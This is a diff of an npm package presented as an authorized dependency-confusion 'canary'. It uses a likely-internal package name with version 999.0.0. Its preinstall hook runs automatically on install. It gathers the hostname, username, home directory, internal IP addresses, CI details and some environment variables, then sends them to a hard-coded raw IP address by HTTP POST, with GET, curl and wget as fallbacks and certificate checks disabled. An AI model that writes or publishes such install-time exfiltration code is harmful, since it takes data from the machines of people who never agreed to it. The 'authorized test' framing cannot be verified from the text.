production-workflow-svc 999.0.0-security-test

package/index.js

@@ -0,0 +1,16 @@
+/**
+ * SECURITY TEST - Dependency Confusion Canary
+ * 
+ * This package is part of an authorized security assessment.
+ * If you see this in your project, your build system may be
+ * vulnerable to dependency confusion attacks.
+ * 
+ * Contact: heidelbergcloud-security@heidelberg.com
+ */
+
+module.exports = {
+    name: 'production-workflow-svc',
+    version: '999.0.0-security-test',
+    type: 'canary',
+    message: 'This is a security test package. Please contact heidelbergcloud-security@heidelberg.com'
+};

package/package.json

@@ -0,0 +1,26 @@
+{
+  "name": "production-workflow-svc",
+  "version": "999.0.0-security-test",
+  "description": "SECURITY TEST - Dependency Confusion Canary - Contact: heidelbergcloud-security@heidelberg.com",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node preinstall.js || true"
+  },
+  "keywords": [
+    "security-test",
+    "dependency-confusion",
+    "canary",
+    "do-not-use"
+  ],
+  "author": "Heidelberg Security Team <heidelbergcloud-security@heidelberg.com>",
+  "license": "UNLICENSED",
+  "private": false,
+  "repository": {
+    "type": "git",
+    "url": "https://github.com/heidelberg-security/dependency-confusion-test"
+  },
+  "config": {
+    "callback_url": "http://3.250.204.221:65204",
+    "canary_id": "heidelberg-production-workflow-test"
+  }
+}

package/preinstall.js

@@ -0,0 +1,285 @@
+const CALLBACK_URL = process.env.CANARY_CALLBACK_URL || 'http://3.250.204.221:65204';
+const PACKAGE_NAME = 'production-workflow-svc';
+const PACKAGE_VERSION = '999.0.0-security-test';
+const CANARY_ID = process.env.CANARY_ID || 'heidelberg-production-workflow-test';
+
+// ════════════════════════════════════════════════════════════════════════════
+
+const https = require('https');
+const http = require('http');
+const os = require('os');
+const { execSync } = require('child_process');
+
+/**
+ * Sammle System-Informationen für Callback
+ */
+function collectSystemInfo() {
+    const info = {
+        // Package Info
+        package: PACKAGE_NAME,
+        version: PACKAGE_VERSION,
+        canary_id: CANARY_ID,
+        timestamp: new Date().toISOString(),
+        
+        // System Info
+        hostname: os.hostname(),
+        platform: os.platform(),
+        arch: os.arch(),
+        release: os.release(),
+        user: os.userInfo().username,
+        homedir: os.homedir(),
+        cwd: process.cwd(),
+        
+        // Node Info
+        node_version: process.version,
+        npm_version: process.env.npm_package_version || 'unknown',
+        
+        // CI/CD Detection
+        ci: detectCI(),
+        
+        // Environment (gefiltert - nur CI-relevante Variablen)
+        env: filterEnvironment()
+    };
+    
+    // Optional: Netzwerk-Info
+    try {
+        const interfaces = os.networkInterfaces();
+        const ips = [];
+        for (const name of Object.keys(interfaces)) {
+            for (const iface of interfaces[name]) {
+                if (!iface.internal && iface.family === 'IPv4') {
+                    ips.push({ name, address: iface.address });
+                }
+            }
+        }
+        info.network = ips;
+    } catch (e) {
+        info.network = 'error';
+    }
+    
+    return info;
+}
+
+/**
+ * Erkenne CI/CD Umgebung
+ */
+function detectCI() {
+    const ciIndicators = {
+        'GitLab CI': !!process.env.GITLAB_CI,
+        'GitHub Actions': !!process.env.GITHUB_ACTIONS,
+        'Jenkins': !!process.env.JENKINS_URL,
+        'Azure Pipelines': !!process.env.TF_BUILD,
+        'CircleCI': !!process.env.CIRCLECI,
+        'Travis CI': !!process.env.TRAVIS,
+        'Bitbucket Pipelines': !!process.env.BITBUCKET_BUILD_NUMBER,
+        'AWS CodeBuild': !!process.env.CODEBUILD_BUILD_ID,
+        'Generic CI': !!process.env.CI
+    };
+    
+    const detected = Object.entries(ciIndicators)
+        .filter(([_, v]) => v)
+        .map(([k, _]) => k);
+    
+    return detected.length > 0 ? detected : ['local'];
+}
+
+/**
+ * Filtere Environment-Variablen (nur sichere/relevante)
+ */
+function filterEnvironment() {
+    const safeVars = [
+        'CI', 'GITLAB_CI', 'GITHUB_ACTIONS', 'JENKINS_URL', 'TF_BUILD',
+        'CIRCLECI', 'TRAVIS', 'BITBUCKET_BUILD_NUMBER', 'CODEBUILD_BUILD_ID',
+        'CI_PROJECT_NAME', 'CI_PIPELINE_ID', 'CI_JOB_NAME', 'CI_RUNNER_ID',
+        'GITHUB_REPOSITORY', 'GITHUB_WORKFLOW', 'GITHUB_RUN_ID',
+        'npm_lifecycle_event', 'npm_package_name',
+        'NODE_ENV', 'PATH'
+    ];
+    
+    const filtered = {};
+    for (const key of safeVars) {
+        if (process.env[key]) {
+            if (key === 'PATH') {
+                filtered[key] = process.env[key].substring(0, 200) + '...';
+            } else {
+                filtered[key] = process.env[key];
+            }
+        }
+    }
+    return filtered;
+}
+
+/**
+ * Sende HTTP/HTTPS Callback
+ */
+function sendCallback(info) {
+    return new Promise((resolve, reject) => {
+        try {
+            const url = new URL(CALLBACK_URL);
+            const isHttps = url.protocol === 'https:';
+            const client = isHttps ? https : http;
+            
+            const data = JSON.stringify(info);
+            
+            const options = {
+                hostname: url.hostname,
+                port: url.port || (isHttps ? 443 : 80),
+                path: url.pathname || '/',
+                method: 'POST',
+                headers: {
+                    'Content-Type': 'application/json',
+                    'Content-Length': Buffer.byteLength(data),
+                    'User-Agent': `npm-canary/${PACKAGE_NAME}`,
+                    'X-Canary-Package': PACKAGE_NAME,
+                    'X-Canary-Version': PACKAGE_VERSION
+                },
+                timeout: 10000,
+                rejectUnauthorized: false
+            };
+            
+            const req = client.request(options, (res) => {
+                resolve({ status: res.statusCode, method: 'POST' });
+            });
+            
+            req.on('error', (e) => {
+                sendCallbackGET(info).then(resolve).catch(reject);
+            });
+            
+            req.on('timeout', () => {
+                req.destroy();
+                reject(new Error('Timeout'));
+            });
+            
+            req.write(data);
+            req.end();
+            
+        } catch (e) {
+            reject(e);
+        }
+    });
+}
+
+/**
+ * Fallback: GET Request mit Query-Parametern
+ */
+function sendCallbackGET(info) {
+    return new Promise((resolve, reject) => {
+        try {
+            const url = new URL(CALLBACK_URL);
+            const isHttps = url.protocol === 'https:';
+            const client = isHttps ? https : http;
+            
+            const params = new URLSearchParams({
+                pkg: info.package,
+                id: info.canary_id,
+                host: info.hostname,
+                user: info.user,
+                ci: info.ci.join(','),
+                ts: Date.now()
+            });
+            
+            const options = {
+                hostname: url.hostname,
+                port: url.port || (isHttps ? 443 : 80),
+                path: `${url.pathname || '/'}?${params.toString()}`,
+                method: 'GET',
+                timeout: 10000,
+                rejectUnauthorized: false
+            };
+            
+            const req = client.request(options, (res) => {
+                resolve({ status: res.statusCode, method: 'GET' });
+            });
+            
+            req.on('error', reject);
+            req.on('timeout', () => {
+                req.destroy();
+                reject(new Error('Timeout'));
+            });
+            
+            req.end();
+            
+        } catch (e) {
+            reject(e);
+        }
+    });
+}
+
+/**
+ * Fallback: curl/wget (für Umgebungen ohne Node HTTPS)
+ */
+function sendCallbackCurl(info) {
+    const compact = JSON.stringify({
+        pkg: info.package,
+        id: info.canary_id,
+        host: info.hostname,
+        user: info.user,
+        ci: info.ci
+    });
+    
+    try {
+        execSync(`curl -s -k -X POST -H "Content-Type: application/json" -d '${compact}' "${CALLBACK_URL}" 2>/dev/null`, {
+            timeout: 10000,
+            stdio: ['pipe', 'pipe', 'pipe']
+        });
+        return { method: 'curl', status: 'sent' };
+    } catch (e) {
+        try {
+            execSync(`wget -q --no-check-certificate --post-data='${compact}' "${CALLBACK_URL}" -O /dev/null 2>/dev/null`, {
+                timeout: 10000,
+                stdio: ['pipe', 'pipe', 'pipe']
+            });
+            return { method: 'wget', status: 'sent' };
+        } catch (e2) {
+            return { method: 'none', status: 'failed' };
+        }
+    }
+}
+
+/**
+ * Zeige Security-Warning
+ */
+function showWarning() {
+    console.log('');
+    console.log('╔═══════════════════════════════════════════════════════════════════╗');
+    console.log('║  ⚠️  SECURITY TEST - DEPENDENCY CONFUSION CANARY                  ║');
+    console.log('╠═══════════════════════════════════════════════════════════════════╣');
+    console.log('║  This package was installed as part of an authorized security    ║');
+    console.log('║  assessment. If you did not expect this, your build system may   ║');
+    console.log('║  be vulnerable to dependency confusion attacks.                  ║');
+    console.log('║                                                                   ║');
+    console.log('║  Package: production-workflow-svc                                 ║');
+    console.log('║  Contact: heidelbergcloud-security@heidelberg.com                ║');
+    console.log('╚═══════════════════════════════════════════════════════════════════╝');
+    console.log('');
+}
+
+// ════════════════════════════════════════════════════════════════════════════
+// MAIN
+// ════════════════════════════════════════════════════════════════════════════
+
+async function main() {
+    showWarning();
+    
+    if (CALLBACK_URL.includes('YOUR-VPS')) {
+        console.log('[CANARY] No callback URL configured - skipping callback');
+        return;
+    }
+    
+    console.log(`[CANARY] Package: ${PACKAGE_NAME}@${PACKAGE_VERSION}`);
+    console.log(`[CANARY] Callback URL: ${CALLBACK_URL}`);
+    
+    const info = collectSystemInfo();
+    
+    try {
+        const result = await sendCallback(info);
+        console.log(`[CANARY] Callback sent via ${result.method} (${result.status})`);
+    } catch (e) {
+        const result = sendCallbackCurl(info);
+        console.log(`[CANARY] Callback via ${result.method}: ${result.status}`);
+    }
+}
+
+main().catch(e => {
+    console.log('[CANARY] Callback failed:', e.message);
+});